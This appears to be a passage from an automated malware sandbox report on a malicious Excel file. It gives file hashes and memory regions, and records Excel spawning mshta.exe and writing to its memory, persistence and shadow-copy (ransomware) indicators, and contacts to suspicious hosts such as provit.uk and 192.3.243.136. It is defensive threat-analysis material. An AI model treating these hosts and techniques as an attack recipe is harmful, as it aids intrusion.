SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 a56ee2770383b51628d2d20ce179de0f
SHA1 288a2a7c48dfe0bac0a7388fce8122845cfb04f2
SHA256 8909f8abfd3b7b06136531eb3ca81f0a3377369d80e9597a94834c33ca154094
SHA512 e64a4cc3ab34c7c96ffdbdab63924b93c071f4491d1617e1fbbcd4117e63ffebe63d72254fa30b6af321b94c5e6b228d7b79d9207255962035c7258ecd96eb4a

C:\Users\Admin\AppData\Local\Temp\tmp4192.tmp

MD5 e7f601e9f8dfa0e17e3a9e63ed32c661
SHA1 4f71185e0f401b03c985c6882a8d1afc36949ced
SHA256 45c41a8d88c697291c6d4051d4bf470a6754822a7340042737f005d3c3bcfd0e
SHA512 1d3f834da17afc1039a222a271fbaa725dffe175f7c91105c7c4b68ea9e2e3f0d399c20c0095cd17d3e37e265a84775d301e9779b0e06789ed70fc62d3537567

memory/2568-91-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2568-104-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2568-102-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2568-101-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2568-99-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2568-97-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2568-95-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2568-93-0x0000000000400000-0x00000000004A2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

memory/2568-123-0x0000000000400000-0x00000000004A2000-memory.dmp

memory/2568-132-0x0000000000400000-0x00000000004A2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-21 08:55

Reported

2024-11-21 08:58

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

154s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4832 wrote to memory of 4136 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 4832 wrote to memory of 4136 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 152.254.1.23.in-addr.arpa udp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 provit.uk udp
GB 198.244.140.41:443 provit.uk tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r11.o.lencr.org udp
FR 23.1.254.145:80 r11.o.lencr.org tcp
US 192.3.243.136:80 192.3.243.136 tcp
US 8.8.8.8:53 41.140.244.198.in-addr.arpa udp
US 8.8.8.8:53 51.189.46.23.in-addr.arpa udp
US 8.8.8.8:53 145.254.1.23.in-addr.arpa udp
US 8.8.8.8:53 136.243.3.192.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 175.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 216.254.1.23.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

memory/4832-0-0x00007FFEC6AF0000-0x00007FFEC6B00000-memory.dmp

memory/4832-3-0x00007FFF06B0D000-0x00007FFF06B0E000-memory.dmp

memory/4832-4-0x00007FFEC6AF0000-0x00007FFEC6B00000-memory.dmp

memory/4832-2-0x00007FFEC6AF0000-0x00007FFEC6B00000-memory.dmp

memory/4832-1-0x00007FFEC6AF0000-0x00007FFEC6B00000-memory.dmp

memory/4832-5-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-6-0x00007FFEC6AF0000-0x00007FFEC6B00000-memory.dmp

memory/4832-7-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-8-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-10-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-9-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-11-0x00007FFEC4330000-0x00007FFEC4340000-memory.dmp

memory/4832-12-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-13-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-14-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-15-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-16-0x00007FFEC4330000-0x00007FFEC4340000-memory.dmp

memory/4136-34-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4136-38-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4136-40-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4832-42-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4136-46-0x00007FFF06A70000-0x00007FFF06C65000-memory.dmp

memory/4136-47-0x00007FF6915E0000-0x00007FF6915E8000-memory.dmp